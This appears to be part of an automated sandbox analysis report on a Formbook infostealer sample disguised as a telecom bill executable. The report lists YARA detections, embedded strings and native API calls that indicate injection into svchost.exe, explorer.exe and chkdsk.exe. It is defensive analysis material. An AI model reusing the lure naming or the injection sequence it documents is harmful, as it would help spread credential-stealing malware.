Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Etisalat Summary Bill for the Month of August.exe PID: 6544, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: chkdsk.exe PID: 3128, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Etisalat Summary Bill for the Month of August.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_827fa540-6
Source: Etisalat Summary Bill for the Month of August.exe, 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1de54778-9
Source: Etisalat Summary Bill for the Month of August.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_896ec071-d
Source: Etisalat Summary Bill for the Month of August.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cdf021bf-c

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Etisalat Summary Bill for the Month of August.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A360 NtCreateFile,	2_2_0041A360
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A410 NtReadFile,	2_2_0041A410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A490 NtClose,	2_2_0041A490
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,	2_2_0041A540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A35A NtCreateFile,	2_2_0041A35A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A45A NtClose,	2_2_0041A45A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A40D NtReadFile,	2_2_0041A40D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A48A NtClose,	2_2_0041A48A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A53C NtAllocateVirtualMemory,	2_2_0041A53C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk,	2_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AD0 NtReadFile,LdrInitializeThunk,	2_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FB0 NtResumeThread,LdrInitializeThunk,	2_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F90 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FE0 NtCreateFile,LdrInitializeThunk,	2_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F30 NtCreateSection,LdrInitializeThunk,	2_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E80 NtReadVirtualMemory,LdrInitializeThunk,	2_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DD0 NtDelayExecution,LdrInitializeThunk,	2_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D30 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D10 NtMapViewOfSection,LdrInitializeThunk,	2_2_03A72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CA0 NtQueryInformationToken,LdrInitializeThunk,	2_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74340 NtSetContextThread,	2_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74650 NtSuspendThread,	2_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BA0 NtEnumerateValueKey,	2_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B80 NtQueryInformationFile,	2_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BE0 NtQueryValueKey,	2_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AB0 NtWaitForSingleObject,	2_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AF0 NtWriteFile,	2_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FA0 NtQuerySection,	2_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F60 NtCreateProcessEx,	2_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EE0 NtQueueApcThread,	2_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E30 NtWriteVirtualMemory,	2_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DB0 NtEnumerateKey,	2_2_03A72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D00 NtSetInformationFile,	2_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CF0 NtOpenProcess,	2_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CC0 NtQueryVirtualMemory,	2_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C00 NtQueryInformationProcess,	2_2_03A72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C60 NtCreateKey,	2_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73090 NtSetValueKey,	2_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73010 NtOpenDirectoryObject,	2_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A735C0 NtCreateMutant,	2_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A739B0 NtGetContextThread,	2_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D10 NtOpenProcessToken,	2_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A73D70 NtOpenThread,	2_2_03A73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,	2_2_03F6A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03F6A042 NtQueryInformationProcess,	2_2_03F6A042
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A9E12 NtProtectVirtualMemory,	3_2_0E5A9E12
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A8232 NtCreateFile,	3_2_0E5A8232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A9E0A NtProtectVirtualMemory,	3_2_0E5A9E0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952DD0 NtDelayExecution,LdrInitializeThunk,	4_2_05952DD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_05952DF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_05952D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_05952CA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_05952C70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952C60 NtCreateKey,LdrInitializeThunk,	4_2_05952C60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952FE0 NtCreateFile,LdrInitializeThunk,	4_2_05952FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952F30 NtCreateSection,LdrInitializeThunk,	4_2_05952F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_05952EA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_05952BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_05952BE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952B60 NtClose,LdrInitializeThunk,	4_2_05952B60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952AD0 NtReadFile,LdrInitializeThunk,	4_2_05952AD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059535C0 NtCreateMutant,LdrInitializeThunk,	4_2_059535C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05954650 NtSuspendThread,	4_2_05954650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05954340 NtSetContextThread,	4_2_05954340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952DB0 NtEnumerateKey,	4_2_05952DB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952D00 NtSetInformationFile,	4_2_05952D00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952D30 NtUnmapViewOfSection,	4_2_05952D30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952CC0 NtQueryVirtualMemory,	4_2_05952CC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952CF0 NtOpenProcess,	4_2_05952CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952C00 NtQueryInformationProcess,	4_2_05952C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952F90 NtProtectVirtualMemory,	4_2_05952F90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952FB0 NtResumeThread,	4_2_05952FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952FA0 NtQuerySection,	4_2_05952FA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952F60 NtCreateProcessEx,	4_2_05952F60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952E80 NtReadVirtualMemory,	4_2_05952E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952EE0 NtQueueApcThread,	4_2_05952EE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952E30 NtWriteVirtualMemory,	4_2_05952E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952B80 NtQueryInformationFile,	4_2_05952B80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952BA0 NtEnumerateValueKey,	4_2_05952BA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952AB0 NtWaitForSingleObject,	4_2_05952AB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05952AF0 NtWriteFile,	4_2_05952AF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05953090 NtSetValueKey,	4_2_05953090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05953010 NtOpenDirectoryObject,	4_2_05953010
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05953D10 NtOpenProcessToken,	4_2_05953D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05953D70 NtOpenThread,	4_2_05953D70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059539B0 NtGetContextThread,	4_2_059539B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA540 NtAllocateVirtualMemory,	4_2_050CA540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA410 NtReadFile,	4_2_050CA410
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA490 NtClose,	4_2_050CA490
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA360 NtCreateFile,	4_2_050CA360
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA53C NtAllocateVirtualMemory,	4_2_050CA53C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA40D NtReadFile,	4_2_050CA40D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA45A NtClose,	4_2_050CA45A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA48A NtClose,	4_2_050CA48A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_050CA35A NtCreateFile,	4_2_050CA35A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0564A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	4_2_0564A036
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05649BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	4_2_05649BAF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0564A042 NtQueryInformationProcess,	4_2_0564A042
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05649BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_05649BB2

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0090D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0090D5EB

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_00901201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00901201

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe

Code function: 0_2_0090E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0090E8F6

Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00912046	0_2_00912046
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008A8060	0_2_008A8060
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00908298	0_2_00908298
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008DE4FF	0_2_008DE4FF
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008D676B	0_2_008D676B
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_00934873	0_2_00934873
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008CCAA0	0_2_008CCAA0
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008ACAF0	0_2_008ACAF0
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008BCC39	0_2_008BCC39
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008A91C0	0_2_008A91C0
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008BB119	0_2_008BB119
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C1394	0_2_008C1394
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C1706	0_2_008C1706
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C781B	0_2_008C781B
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C19B0	0_2_008C19B0
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008A7920	0_2_008A7920
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008B997D	0_2_008B997D
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C7A4A	0_2_008C7A4A
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C7CA7	0_2_008C7CA7
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C1C77	0_2_008C1C77
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008D9EEE	0_2_008D9EEE
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_0092BE44	0_2_0092BE44
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_008C1F32	0_2_008C1F32
Source: C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe	Code function: 0_2_01F43640	0_2_01F43640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D826	2_2_0041D826
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E111	2_2_0041E111
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E324	2_2_0041E324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041DD7F	2_2_0041DD7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E60	2_2_00409E60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E3F0	2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B003E6	2_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA352	2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC02C0	2_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE0274	2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF41A2	2_2_03AF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B001AA	2_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF81CC	2_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30100	2_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADA118	2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64750	2_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C6E0	2_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B00591	2_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEE4F6	2_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4420	2_2_03AE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF2446	2_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF6BD7	2_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFAB40	2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B0A9A6	2_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A268B8	2_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E8F0	2_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4A840	2_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A42840	2_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABEFA0	2_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A82F28	2_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60F30	2_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE2F30	2_2_03AE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40	2_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52E90	2_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFCE93	2_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEEDB	2_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFEE26	2_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40E59	2_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A58DBF	2_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3ADE0	2_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4AD00	2_2_03A4AD00
